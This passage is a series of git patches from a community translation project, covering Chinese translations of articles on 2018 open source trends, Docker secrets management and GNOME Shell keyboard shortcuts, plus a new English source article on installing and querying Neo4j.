DeepDive 项目借鉴 Watson 的机器学习能力,通过不断学习人类行为来增强决断能力。另一个开源平台 [OpenCog][34] ,为开发者和数据科学家开发人工智能应用程序提供支撑。 + +考虑到实现先进的、个性化的用户体验风险较高,这些认知云平台决定来年时机成熟,再粉墨登场。 + +### 10.物联网智联万物 + +物联网(IoT)的核心在于建立小到嵌入式传感器、大至计算机设备的相互连接,让其(“事物”)相互之间可以收发数据。毫无疑问,物联网将会是科技届的下一个 “搅局者”,但物联网本身处于一个不断变化的状态。 + +物联网最广为人知的产品就是 IBM 和三星合力打造的去中心化P2P自动遥测系统([ADEPT][20])。它运用和区块链类似的技术来构建一个去中心化的物联网。没有中央控制设备,”事物“ 之间通过自主交流来进行升级软件、处理bug、管理电源等等一系列操作。 + +### 开源推动技术创新 + +[数字中断][30]是当今以科技为中心的时代的常态。在技术领域,开放源代码正在逐渐普及,其在2018将年成为大多数科技创新的驱动力。 + +此榜单对开源技术趋势的预测有遗漏?在评论区告诉我们吧! + +*文章标签:* [ `商业` ][25] [ `年鉴` ][26] [ `2017开源年鉴` ][27] + +### 关于作者 + +![Sreejith Omanakuttan](https://opensource.com/sites/default/files/styles/profile_pictures/public/pictures/brain_2.jpg?itok=9PkPTyrV) + +[**Sreejith Omanakuttan**][21] - 自 2000 年开始编程,2007年开始从事专业工作。目前在 [Fingent][6] 领导开源团队,工作内容涵盖不同的技术层面,从“无聊的工作”(?)到前沿科技。有一套 “构建—修复—推倒重来” 工作哲学。在领英上关注我:https://www.linkedin.com/in/futuregeek/ + +-------------------------------------------------------------------------------- + +原文链接: https://opensource.com/article/17/11/10-open-source-technology-trends-2018 + +作者:[Sreejith ][a] +译者:[wangy325](https://github.com/wangy25) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/sreejith +[1]:https://opensource.com/resources/what-is-openstack?intcmp=7016000000127cYAAQ +[2]:https://opensource.com/resources/openstack/tutorials?intcmp=7016000000127cYAAQ +[3]:https://opensource.com/tags/openstack?intcmp=7016000000127cYAAQ +[4]:https://www.rdoproject.org/?intcmp=7016000000127cYAAQ +[5]:https://opensource.com/article/17/11/10-open-source-technology-trends-2018?rate=GJqOXhiWvZh0zZ6WVTUzJ2TDJBpVpFhngfuX9V-dz4I +[6]:https://www.fingent.com/ +[7]:https://www.linkedin.com/in/futuregeek/ +[9]:https://opensource.com/user/185026/feed +[10]:https://www.flickr.com/photos/mitchell3417/9206373620 +[11]:https://creativecommons.org/licenses/by-sa/4.0/ +[12]:https://www.openstack.org/ +[13]:https://developers.google.com/web/progressive-web-apps/ +[14]:https://www.rust-lang.org/ +[15]:https://en.wikipedia.org/wiki/Pwn2Own +[16]:https://en.wikipedia.org/wiki/R_(programming_language) +[17]:https://en.wikipedia.org/wiki/S_(programming_language) +[18]:https://opensource.com/tags/artificial-intelligence +[19]:https://sdtimes.com/gartners-top-10-technology-trends-2018/ +[20]:https://insights.samsung.com/2016/03/17/block-chain-mobile-and-the-internet-of-things/ +[21]:https://opensource.com/users/sreejith +[22]:https://opensource.com/users/sreejith +[23]:https://opensource.com/users/sreejith +[24]:https://opensource.com/article/17/11/10-open-source-technology-trends-2018#comments +[25]:https://opensource.com/tags/business +[26]:https://opensource.com/tags/yearbook +[27]:https://opensource.com/yearbook/2017 +[28]:https://www.techopedia.com/2/31967/trends/open-source/container-technology-the-next-big-thing +[29]:https://en.wikipedia.org/wiki/Chatbot +[30]:https://cio-wiki.org/home/loc/home?page=digital-disruption +[31]:https://opensource.com/ +[32]:https://en.wikipedia.org/wiki/GNU_Project +[33]:https://en.wikipedia.org/wiki/Watson_(computer) +[34]:https://en.wikipedia.org/wiki/OpenCog \ No newline at end of file From e802d93290192a6bd8f49017c1c7914005becd8b Mon Sep 17 00:00:00 2001 From: wangy325 Date: Mon, 18 Dec 2017 12:12:27 +0800 Subject: [PATCH 0678/1627] translated by wangy325 --- ...d => 20171129 10 OPEN SOURCE TECHNOLOGY TRENDS FOR 2018_CN.md} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename translated/tech/{10 OPEN SOURCE TECHNOLOGY TRENDS FOR 2018_cn.md => 20171129 10 OPEN SOURCE TECHNOLOGY TRENDS FOR 2018_CN.md} (100%) diff --git a/translated/tech/10 OPEN SOURCE TECHNOLOGY TRENDS FOR 2018_cn.md b/translated/tech/20171129 10 OPEN SOURCE TECHNOLOGY TRENDS FOR 2018_CN.md similarity index 100% rename from translated/tech/10 OPEN SOURCE TECHNOLOGY TRENDS FOR 2018_cn.md rename to translated/tech/20171129 10 OPEN SOURCE TECHNOLOGY TRENDS FOR 2018_CN.md From 5cbbe621d4997fa9968bd365843115954ddaca12 Mon Sep 17 00:00:00 2001 From: TRsky <625310581@qq.com> Date: Mon, 18 Dec 2017 12:34:12 +0800 Subject: [PATCH 0679/1627] fix some errors of translation --- ...170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/translated/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md b/translated/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md index 7b6161a475..53858b1fce 100644 --- a/translated/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md +++ b/translated/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md @@ -1,14 +1,14 @@ - -Dockers Secrets 管理介绍 -========================= + +Dockers 涉密数据(Secrets) 管理介绍 +==================================== 容器正在改变我们对应用程序和基础设施的看法。无论容器内的代码量是大还是小,容器架构都会引起代码如何与硬件相互作用方式的改变 —— 它从根本上将其从基础设施中抽象出来。对于容器安全来说,在 Docker 中,容器的安全性有三个关键组成部分,他们相互作用构成本质上更安全的应用程序。 ![Docker Security](https://i2.wp.com/blog.docker.com/wp-content/uploads/e12387a1-ab21-4942-8760-5b1677bc656d-1.jpg?w=1140&ssl=1) -构建更安全的应用程序的一个关键因素是与其他应用程序和系统进行安全通信,这通常需要证书、tokens、密码和其他类型的验证信息凭证 —— 通常称为应用程序 涉密数据。我们很高兴可以推出 Docker 涉密数据,一个容器的原生解决方案,它是加强容器安全的可信赖交付组件,用户可以在容器平台上直接集成涉密数据(secret) 分发功能。 +构建更安全的应用程序的一个关键因素是与其他应用程序和系统进行安全通信,这通常需要证书、tokens、密码和其他类型的验证信息凭证 —— 通常称为应用程序涉密数据。我们很高兴可以推出 Docker 涉密数据,一个容器的原生解决方案,它是加强容器安全的可信赖交付组件,用户可以在容器平台上直接集成涉密数据(secret) 分发功能。 -有了容器,现在应用程序在多环境下是动态的、可移植的。这使得现存的涉密数据(secret) 分发的解决方案略显不足,因为它们都是针对静态环境。不幸的是,这导致了应用程序涉密数据(secrets)应用不善管理的增加,使得不安全的本地解决方案变得十分普遍,比如像 GitHub 嵌入涉密数据(secrets)到版本控制系统,或者在这之后考虑了其他同样不好的解决方案。 +有了容器,现在应用程序在多环境下是动态的、可移植的。这使得现存的涉密数据分发的解决方案略显不足,因为它们都是针对静态环境。不幸的是,这导致了应用程序涉密数据(secrets)应用不善管理的增加,使得不安全的本地解决方案变得十分普遍,比如像 GitHub 嵌入涉密数据到版本控制系统,或者在这之后考虑了其他同样不好的解决方案。 ### Docker 涉密数据(Secrets) 管理介绍 @@ -26,7 +26,7 @@ Dockers Secrets 管理介绍 $ echo "This is a secret" | docker secret create my_secret_data - ``` -一旦,涉密数据到达一个管理节点,它将被保存到内部的 Raft 存储区中,该存储区使用 NACL 开源加密库中的Salsa20Poly1305加密算生成的256位密钥加密。以确保没有任何数据被永久写入未加密的磁盘。向内部存储写入涉密数据,给予了涉密数据跟其他集群数据一样的高可用性。 +一旦,涉密数据到达一个管理节点,它将被保存到内部的 Raft 存储区中,该存储区使用 NACL 开源加密库中的 Salsa20、Poly1305 加密算法生成的256位密钥进行加密。以确保没有任何数据被永久写入未加密的磁盘。向内部存储写入涉密数据,给予了涉密数据跟其他集群数据一样的高可用性。 当集群管理器启动的时,包含 涉密数据 的被加密过的 Raft 日志通过每一个节点唯一的数据密钥进行解密。此密钥以及用于与集群其余部分通信的节点的 TLS 证书可以使用一个集群范围的加密密钥进行加密。该密钥称为“解锁密钥”,也使用 Raft 进行传播,将且会在管理器启动的时候被使用。 @@ -65,7 +65,7 @@ cat: can't open '/run/secrets/my_secret_data': No such file or directory ### 通过 Docker 更安全地使用应用程序 -Docker 涉密数据旨在让开发人员和IT运营团队可以轻松使用,以用于构建和运行更安全的应用程序。它是是首个被设计为既能保持涉密数据安全又能仅在当被需要涉密数据操作的确切容器需要的使用的容器结构。从使用Docker Compose定义应用程序和涉密数据,到 IT 管理人员直接在 Docker Datacenter 中部署 Compose 文件、涉密数据(涉密数据),networks 和卷 volumes 都将加密、安全地跟应用程序一起传输。 +Docker 涉密数据旨在让开发人员和 IT 运营团队可以轻松使用,以用于构建和运行更安全的应用程序。它是是首个被设计为既能保持涉密数据安全又能仅在当被需要涉密数据操作的确切容器需要的使用的容器结构。从使用 Docker Compose 定义应用程序和涉密数据,到 IT 管理人员直接在 Docker Datacenter 中部署的 Compose 文件、涉密数据,networks 和 volumes 都将被加密并安全地跟应用程序一起传输。 更多相关学习资源: From defb9035f0e40e19ab41724df8698e06f59a0367 Mon Sep 17 00:00:00 2001 From: TRsky <625310581@qq.com> Date: Mon, 18 Dec 2017 12:40:15 +0800 Subject: [PATCH 0680/1627] fix some errors of translation --- .../tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/translated/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md b/translated/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md index 53858b1fce..91b1d17aad 100644 --- a/translated/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md +++ b/translated/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md @@ -26,7 +26,7 @@ Dockers 涉密数据(Secrets) 管理介绍 $ echo "This is a secret" | docker secret create my_secret_data - ``` -一旦,涉密数据到达一个管理节点,它将被保存到内部的 Raft 存储区中,该存储区使用 NACL 开源加密库中的 Salsa20、Poly1305 加密算法生成的256位密钥进行加密。以确保没有任何数据被永久写入未加密的磁盘。向内部存储写入涉密数据,给予了涉密数据跟其他集群数据一样的高可用性。 +一旦,涉密数据到达一个管理节点,它将被保存到内部的 Raft 存储区中,该存储区使用 NACL 开源加密库中的 Salsa20、Poly1305 加密算法生成的 256 位密钥进行加密。以确保没有任何数据被永久写入未加密的磁盘。向内部存储写入涉密数据,给予了涉密数据跟其他集群数据一样的高可用性。 当集群管理器启动的时,包含 涉密数据 的被加密过的 Raft 日志通过每一个节点唯一的数据密钥进行解密。此密钥以及用于与集群其余部分通信的节点的 TLS 证书可以使用一个集群范围的加密密钥进行加密。该密钥称为“解锁密钥”,也使用 Raft 进行传播,将且会在管理器启动的时候被使用。 @@ -44,7 +44,7 @@ total 4 -r--r--r--    1 root     root            17 Dec 13 22:48 my_secret_data ``` -如果一个服务被删除或者被重新安排在其他地方,集群管理器将立即通知所有不再需要访问该 涉密数据的节点,这些节点将不再有权访问该应用程序的 涉密数据。 +如果一个服务被删除或者被重新安排在其他地方,集群管理器将立即通知所有不再需要访问该 涉密数据的节点,这些节点将不再有权访问该应用程序的涉密数据。 ``` $ docker service update --secret-rm="my_secret_data" redis From 75a74aeaa59030d5cca6908164d5679910056726 Mon Sep 17 00:00:00 2001 From: TRsky <625310581@qq.com> Date: Mon, 18 Dec 2017 12:47:17 +0800 Subject: [PATCH 0681/1627] fix some errors of translation --- .../20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/translated/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md b/translated/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md index 91b1d17aad..0fca78a76f 100644 --- a/translated/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md +++ b/translated/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md @@ -6,9 +6,9 @@ Dockers 涉密数据(Secrets) 管理介绍 ![Docker Security](https://i2.wp.com/blog.docker.com/wp-content/uploads/e12387a1-ab21-4942-8760-5b1677bc656d-1.jpg?w=1140&ssl=1) -构建更安全的应用程序的一个关键因素是与其他应用程序和系统进行安全通信,这通常需要证书、tokens、密码和其他类型的验证信息凭证 —— 通常称为应用程序涉密数据。我们很高兴可以推出 Docker 涉密数据,一个容器的原生解决方案,它是加强容器安全的可信赖交付组件,用户可以在容器平台上直接集成涉密数据(secret) 分发功能。 +构建更安全的应用程序的一个关键因素是与其他应用程序和系统进行安全通信,这通常需要证书、tokens、密码和其他类型的验证信息凭证 —— 通常称为应用程序涉密数据。我们很高兴可以推出 Docker 涉密数据,一个容器的原生解决方案,它是加强容器安全的可信赖交付组件,用户可以在容器平台上直接集成涉密数据分发功能。 -有了容器,现在应用程序在多环境下是动态的、可移植的。这使得现存的涉密数据分发的解决方案略显不足,因为它们都是针对静态环境。不幸的是,这导致了应用程序涉密数据(secrets)应用不善管理的增加,使得不安全的本地解决方案变得十分普遍,比如像 GitHub 嵌入涉密数据到版本控制系统,或者在这之后考虑了其他同样不好的解决方案。 +有了容器,现在应用程序在多环境下是动态的、可移植的。这使得现存的涉密数据分发的解决方案略显不足,因为它们都是针对静态环境。不幸的是,这导致了应用程序涉密数据应用不善管理的增加,使得不安全的本地解决方案变得十分普遍,比如像 GitHub 嵌入涉密数据到版本控制系统,或者在这之后考虑了其他同样不好的解决方案。 ### Docker 涉密数据(Secrets) 管理介绍 @@ -20,7 +20,7 @@ Dockers 涉密数据(Secrets) 管理介绍 ![Docker Secrets Management](https://i0.wp.com/blog.docker.com/wp-content/uploads/b69d2410-9e25-44d8-aa2d-f67b795ff5e3.jpg?w=1140&ssl=1) -在 Docker 中,一个涉密数据是任意的数据块,比如密码、SSH 密钥、TLS 凭证,或者任何其他本质上敏感的数据。当你将一个 涉密数据 加入集群(通过执行 `docker secret create` )时,利用在引导新集群时自动创建的内置证书颁发机构,Docker 通过相互认证的 TLS 连接将密钥发送给集群管理器。 +在 Docker 中,一个涉密数据是任意的数据块,比如密码、SSH 密钥、TLS 凭证,或者任何其他本质上敏感的数据。当你将一个涉密数据加入集群(通过执行 `docker secret create` )时,利用在引导新集群时自动创建的内置证书颁发机构,Docker 通过相互认证的 TLS 连接将密钥发送给集群管理器。 ``` $ echo "This is a secret" | docker secret create my_secret_data - @@ -44,7 +44,7 @@ total 4 -r--r--r--    1 root     root            17 Dec 13 22:48 my_secret_data ``` -如果一个服务被删除或者被重新安排在其他地方,集群管理器将立即通知所有不再需要访问该 涉密数据的节点,这些节点将不再有权访问该应用程序的涉密数据。 +如果一个服务被删除或者被重新安排在其他地方,集群管理器将立即通知所有不再需要访问该涉密数据的节点,这些节点将不再有权访问该应用程序的涉密数据。 ``` $ docker service update --secret-rm="my_secret_data" redis From 23ac851d048403ab75f1aebb8a4e264dd26829a7 Mon Sep 17 00:00:00 2001 From: imquanquan Date: Mon, 18 Dec 2017 12:47:33 +0800 Subject: [PATCH 0682/1627] translated --- ...oard Shortcuts You Might Not Know About.md | 75 +++++++++++++++++++ 1 file changed, 75 insertions(+) create mode 100644 translated/tech/20171120 Useful GNOME Shell Keyboard Shortcuts You Might Not Know About.md diff --git a/translated/tech/20171120 Useful GNOME Shell Keyboard Shortcuts You Might Not Know About.md b/translated/tech/20171120 Useful GNOME Shell Keyboard Shortcuts You Might Not Know About.md new file mode 100644 index 0000000000..9ea840bd34 --- /dev/null +++ b/translated/tech/20171120 Useful GNOME Shell Keyboard Shortcuts You Might Not Know About.md @@ -0,0 +1,75 @@ +你可能不知道你的实用 GNOME Shell 快捷键 +======================================= +由于 Ubuntu 在 17.10 版本转移到了 GNOME Shell,许多用户可能对挖掘最有用的快捷键和如何创建自己的快捷键感兴趣。这篇文章将同时介绍这两者。 + +现有的 GNOME Shell 快捷键使你的生活更加便捷 +========================================== +如果你希望 GNOME 发布成百上千种快捷方式,你会失望地发现,情况并非如此。快捷键列表不会太长,而且并不是全部都对你有用,但仍然会有许多快捷键可以用得上的。 + +![gnome-shortcuts-02-change-shortcut][3] + +![gnome-shortcuts-02-change-shortcut][3] + +可以通过菜单“设置 -> 设备 -> 键盘”访问快捷方式列表。以下是一些不太流行但实用的快捷方式。 + + * `Ctrl` + `Alt` + `T` - 这是一个用来启动终端的快捷键组合,你可以在 GNOME 的任何地方使用它。 + +我个人经常使用的快捷键是: + + * `Alt` + `F4` - 关闭最顶层端口 + * `Alt` + `F8` - 调整窗口大小 + +大多数人都知道如何用 `Alt` + `Tab` 在打开的应用程序之间切换,但是你可能不知道可以使用 `Alt` + `Shift` + `Tab` 在应用程序之间反方向切换。 + +在切换窗口界面时,另一个有用的组合键是 `Alt` + `Tab` 键上面的一个键。(例如:在 US 键盘布局中是: `Alt` + ````` ) + +要是你想显示活动概览,你可以用快捷键 `Alt` + `F1` + +有很多跟工作台有关的快捷键。如果你像我那样不经常使用多个工作台的话,这些快捷键对来说是没用的。尽管如此,以下几个快捷键还是值得留意的: + + * `Super` + `PageUp` (或者 `PageDown` )移动到上方或下方的工作台 + * `Ctrl` + `Alt` + `Left` (或 `Right` )移动到左侧或右侧的工作台 + +如果在这些快捷键中加上 `Shift` ,例如 `Shift` + `Ctrl` + `Alt` + `Left`,则可以把当前窗口移动到其他工作区。 + +我另一个最喜欢的键盘快捷键是辅助功能中的调整文字大小。你可以用 `Ctrl` + `+` (或 `Ctrl` + `-` )快速缩放字体大小。在某些情况下,这个快捷键可能默认是禁用的,所以在尝试之前请先检查一下。 + +上述是一些鲜为人知但是十分有用的键盘快捷键。如果你想知道更多有用的快捷键,可以查看[官方 GNOME Shell 快捷键列表][2]。 + +如何创建自己的 GNOME Shell 快捷键 +================================= + +如果默认的快捷键不符合您的喜好,可以更改它们或创建新的快捷键。你可以同样通过过菜单“设置 -> 设备 -> 键盘“完成这些操作。当你选择你想更改的快捷键条目,下面的对话框就会弹出。 + +输入你想要的键盘快捷键组合。 + +![gnome-shortcuts-03-set-shortcut][4] + +![gnome-shortcuts-03-set-shortcut][4] + +如果这个快捷键已经被使用,你会得到一个消息。如果没有,只需点击设置,就完成了。 + +如果要添加新快捷键而不是更改现有快捷键,请向下滚动,直到看到“+”标志,单击它,在出现的对话框中输入新键盘快捷键的名称和快捷键组合。 + +![gnome-shortcuts-04-add-custom-shortcut][5] + +![gnome-shortcuts-04-add-custom-shortcut][5] + +GNOME 默认情况下并没有提供大量的 shell 快捷键,上面列出的是一些比较有用的快捷键。如果这些快捷键对你来说不够,你可以随时创建自己的快捷键。 + +-------------------------------------------------------------------------------- + +via: https://www.maketecheasier.com/gnome-shell-keyboard-shortcuts/ + +作者:[Ada Ivanova][a] +译者:[imquanquan](https://github.com/imquanquan) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.maketecheasier.com/author/adaivanoff/ +[1]https://www.maketecheasier.com/assets/uploads/2017/10/gnome-shortcuts-01-settings.jpg (gnome-shortcuts-01-settings) +[2]https://wiki.gnome.org/Projects/GnomeShell/CheatSheet +[3]https://www.maketecheasier.com/assets/uploads/2017/10/gnome-shortcuts-02-change-shortcut.png (gnome-shortcuts-02-change-shortcut) +[4]https://www.maketecheasier.com/assets/uploads/2017/10/gnome-shortcuts-03-set-shortcut.png (gnome-shortcuts-03-set-shortcut) +[5]https://www.maketecheasier.com/assets/uploads/2017/10/gnome-shortcuts-04-add-custom-shortcut.png (gnome-shortcuts-04-add-custom-shortcut) From 5adb5ae9421a60cac932c4050f0303e050254921 Mon Sep 17 00:00:00 2001 From: imquanquan Date: Mon, 18 Dec 2017 12:48:03 +0800 Subject: [PATCH 0683/1627] translated --- ...oard Shortcuts You Might Not Know About.md | 78 ------------------- 1 file changed, 78 deletions(-) delete mode 100644 sources/tech/20171120 Useful GNOME Shell Keyboard Shortcuts You Might Not Know About.md diff --git a/sources/tech/20171120 Useful GNOME Shell Keyboard Shortcuts You Might Not Know About.md b/sources/tech/20171120 Useful GNOME Shell Keyboard Shortcuts You Might Not Know About.md deleted file mode 100644 index ee9abe0576..0000000000 --- a/sources/tech/20171120 Useful GNOME Shell Keyboard Shortcuts You Might Not Know About.md +++ /dev/null @@ -1,78 +0,0 @@ -translating by imquanquan -Useful GNOME Shell Keyboard Shortcuts You Might Not Know About -====== -As Ubuntu has moved to Gnome Shell in its 17.10 release, many users may be interested to discover some of the most useful shortcuts in Gnome as well as how to create your own shortcuts. This article will explain both. - -If you expect GNOME to ship with hundreds or thousands of shell shortcuts, you will be disappointed to learn this isn't the case. The list of shortcuts isn't miles long, and not all of them will be useful to you, but there are still many keyboard shortcuts you can take advantage of. - -![gnome-shortcuts-01-settings][1] - -![gnome-shortcuts-01-settings][1] - -To access the list of shortcuts, go to "Settings -> Devices -> Keyboard." Here are some less popular, yet useful shortcuts. - - * Ctrl + Alt + T - this combination launches the terminal; you can use this from anywhere within GNOME - - - -Two shortcuts I personally use quite frequently are: - - * Alt + F4 - close the window on focus - * Alt + F8 - resize the window - - -Most of you know how to switch between open applications (Alt + Tab), but you may not know you can use Alt + Shift + Tab to cycle through applications in reverse direction. - -Another useful combination for switching within the windows of an application is Alt + (key above Tab) (example: Alt + ` on a US keyboard). - -If you want to show the Activities overview, use Alt + F1. - -There are quite a lot of shortcuts related to workspaces. If you are like me and don't use multiple workspaces frequently, these shortcuts are useless to you. Still, some of the ones worth noting are the following: - - * Super + PageUp (or PageDown) moves to the workspace above or below - * Ctrl + Alt + Left (or Right) moves to the workspace on the left/right - -If you add Shift to these commands, e.g. Shift + Ctrl + Alt + Left, you move the window one worskpace above, below, to the left, or to the right. - -Another favorite keyboard shortcut of mine is in the Accessibility section - Increase/Decrease Text Size. You can use Ctrl + + (and Ctrl + -) to zoom text size quickly. In some cases, this may be disabled by default, so do check it out before you try it. - -The above-mentioned shortcuts are lesser known, yet useful keyboard shortcuts. If you are curious to see what else is available, you can check [the official GNOME shell cheat sheet][2]. - -If the default shortcuts are not to your liking, you can change them or create new ones. You do this from the same "Settings -> Devices -> Keyboard" dialog. Just select the entry you want to change, and the following dialog will popup. - -![gnome-shortcuts-02-change-shortcut][3] - -![gnome-shortcuts-02-change-shortcut][3] - -Enter the keyboard combination you want. - -![gnome-shortcuts-03-set-shortcut][4] - -![gnome-shortcuts-03-set-shortcut][4] - -If it is already in use you will get a message. If not, just click Set, and you are done. - -If you want to add new shortcuts rather than change existing ones, scroll down until you see the "Plus" sign, click it, and in the dialog that appears, enter the name and keys of your new keyboard shortcut. - -![gnome-shortcuts-04-add-custom-shortcut][5] - -![gnome-shortcuts-04-add-custom-shortcut][5] - -GNOME doesn't come with tons of shell shortcuts by default, and the above listed ones are some of the more useful ones. If these shortcuts are not enough for you, you can always create your own. Let us know if this is helpful to you. - --------------------------------------------------------------------------------- - -via: https://www.maketecheasier.com/gnome-shell-keyboard-shortcuts/ - -作者:[Ada Ivanova][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://www.maketecheasier.com/author/adaivanoff/ -[1]https://www.maketecheasier.com/assets/uploads/2017/10/gnome-shortcuts-01-settings.jpg (gnome-shortcuts-01-settings) -[2]https://wiki.gnome.org/Projects/GnomeShell/CheatSheet -[3]https://www.maketecheasier.com/assets/uploads/2017/10/gnome-shortcuts-02-change-shortcut.png (gnome-shortcuts-02-change-shortcut) -[4]https://www.maketecheasier.com/assets/uploads/2017/10/gnome-shortcuts-03-set-shortcut.png (gnome-shortcuts-03-set-shortcut) -[5]https://www.maketecheasier.com/assets/uploads/2017/10/gnome-shortcuts-04-add-custom-shortcut.png (gnome-shortcuts-04-add-custom-shortcut) From 7b1f5951cd795e79950330638fb31c9e04d1df06 Mon Sep 17 00:00:00 2001 From: imquanquan Date: Mon, 18 Dec 2017 12:51:34 +0800 Subject: [PATCH 0684/1627] fix some error --- ...GNOME Shell Keyboard Shortcuts You Might Not Know About.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/translated/tech/20171120 Useful GNOME Shell Keyboard Shortcuts You Might Not Know About.md b/translated/tech/20171120 Useful GNOME Shell Keyboard Shortcuts You Might Not Know About.md index 9ea840bd34..8e2b47f6a9 100644 --- a/translated/tech/20171120 Useful GNOME Shell Keyboard Shortcuts You Might Not Know About.md +++ b/translated/tech/20171120 Useful GNOME Shell Keyboard Shortcuts You Might Not Know About.md @@ -4,7 +4,7 @@ 现有的 GNOME Shell 快捷键使你的生活更加便捷 ========================================== -如果你希望 GNOME 发布成百上千种快捷方式,你会失望地发现,情况并非如此。快捷键列表不会太长,而且并不是全部都对你有用,但仍然会有许多快捷键可以用得上的。 +如果你希望 GNOME 发布成百上千种快捷键,你会失望地发现,情况并非如此。快捷键的列表不会太长,而且并不是全部都对你有用,但仍然会有许多快捷键可以用得上的。 ![gnome-shortcuts-02-change-shortcut][3] @@ -21,7 +21,7 @@ 大多数人都知道如何用 `Alt` + `Tab` 在打开的应用程序之间切换,但是你可能不知道可以使用 `Alt` + `Shift` + `Tab` 在应用程序之间反方向切换。 -在切换窗口界面时,另一个有用的组合键是 `Alt` + `Tab` 键上面的一个键。(例如:在 US 键盘布局中是: `Alt` + ````` ) +在切换窗口界面时,另一个有用的组合键是 `Alt` + `Tab` 键上面的一个键。(例如:在 US 键盘布局中是: `Alt` + `` ` `` ) 要是你想显示活动概览,你可以用快捷键 `Alt` + `F1` From d3e90a0b01ab3fd7b68c4d0a3a99e24c6c085101 Mon Sep 17 00:00:00 2001 From: Ezio Date: Mon, 18 Dec 2017 14:02:32 +0800 Subject: [PATCH 0685/1627] =?UTF-8?q?20171218-1=20=E9=80=89=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...o4j and graph databases Getting started.md | 136 ++++++++++++++++++ 1 file changed, 136 insertions(+) create mode 100644 sources/tech/20170717 Neo4j and graph databases Getting started.md diff --git a/sources/tech/20170717 Neo4j and graph databases Getting started.md b/sources/tech/20170717 Neo4j and graph databases Getting started.md new file mode 100644 index 0000000000..c14933a435 --- /dev/null +++ b/sources/tech/20170717 Neo4j and graph databases Getting started.md @@ -0,0 +1,136 @@ +Neo4j and graph databases: Getting started +============================================================ + +### In the second of a three-part series, install Neo4j and start using the web client to insert and query data in the graph. + +![Neo4j and graph databases: Getting started](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/LIFE_wavegraph.png?itok=z4pXCf_c "Neo4j and graph databases: Getting started") +Image by :  + +opensource.com + +In the [first article][8] in this series, we explored some core concepts of graph databases. This time, we'll install the [Neo4j][9] application and begin using the web client to insert and query data in the graph. + +To download the Community Edition of Neo4J [head for their website][10]! You can download a package for Windows or OSX that will work just fine for testing, and there are links for installations on most Linux distros, and via Docker. + +I'll be installing the software on Debian 9 (stretch). You can get [full instructions here][11]. If you're running Debian 8 (jessie) or older, you can install the current Neo4j package, but it will be a bit more difficult as Neo4j requires the Java 8 runtime, which is not packaged with jessie. + +``` +wget -O - https://debian.neo4j.org/neotechnology.gpg.key | sudo apt-key add - echo 'deb https://debian.neo4j.org/repo stable/' | sudo tee /etc/apt/sources.list.d/neo4j.list sudo apt-get update sudo apt-get install neo4j +``` + +On my system, I had to create **/var/run/neo4j**, for some reason, and then it started easily. I got a warning about maximum open files, but that turned out to be a non-issue since this is just a test. By default, Neo4j will listen for connections only on localhost. This is fine, if your Debian box is a desktop, but mine isn't. I edited **/etc/neo4j/neo4j.conf** and uncommented this line: + +``` +dbms.connectors.default_listen_address=0.0.0.0 +``` + +After stopping and restarting Neo4j, I was able to connect by browsing to the server on port 7474\. The default password for the Neo4j user is **neo4j**; you'll have to set a new password, then the startup screen will display: + +### [article_2_image_1.jpg][1] + +![Installing Neo4J](https://opensource.com/sites/default/files/u128651/article_2_image_1.jpg "Installing Neo4J") + +Let's use the graph from the last article, and create it in Neo4j. Here it is again: + +### [article_1_image_2.jpg][2] + +![Graph database image 2, defining a new type of node](https://opensource.com/sites/default/files/u128651/article_1_image_2.jpg "Graph database image 2, defining a new type of node") + +Like MySQL and other database systems, Neo4j uses a query system for all operations. Cypher, the query language of Neo4j, has some syntactic quirks that take a little getting used to. Nodes are always encased in parentheses and relationships in square brackets. Since that's the only type of data there is, that's all you need. + +First, let's create all the nodes. You can copy and paste these into the top box in the browser window, which is where queries are run. + +``` +CREATE (a:Person { name: 'Jane Doe', favorite_color: 'purple' }) CREATE (b:Person { name: 'John Doe' }) CREATE (c:Person { name: 'Mary Smith', favorite_color: 'red', dob: '1992-11-09' }) CREATE (d:Person { name: 'Robert Roe' }) CREATE (e:Person { name: 'Rhonda Roe' }) CREATE (f:Person { name: 'Ryan Roe' }) CREATE (t:City { name: 'Petaluma, CA' }) CREATE (u:City { name: 'Cypress, TX' }) CREATE (v:City { name: 'Grand Prairie, TX' }) CREATE (w:City { name: 'Houston, TX' }) +``` + +Note that the letter before the label is a variable. These will show up elsewhere; they're not useful here, but you can't just blindly create without assignment, so we'll use them and then discard them. + +You should be told that 10 nodes were created and 13 properties set. Want to see them? Here's a query that matches and returns all nodes: + +``` +MATCH (n) RETURN n +``` + +This will return a visual graph. (Within the app, you can use the "fullscreen" icon on the returned graph to see the whole 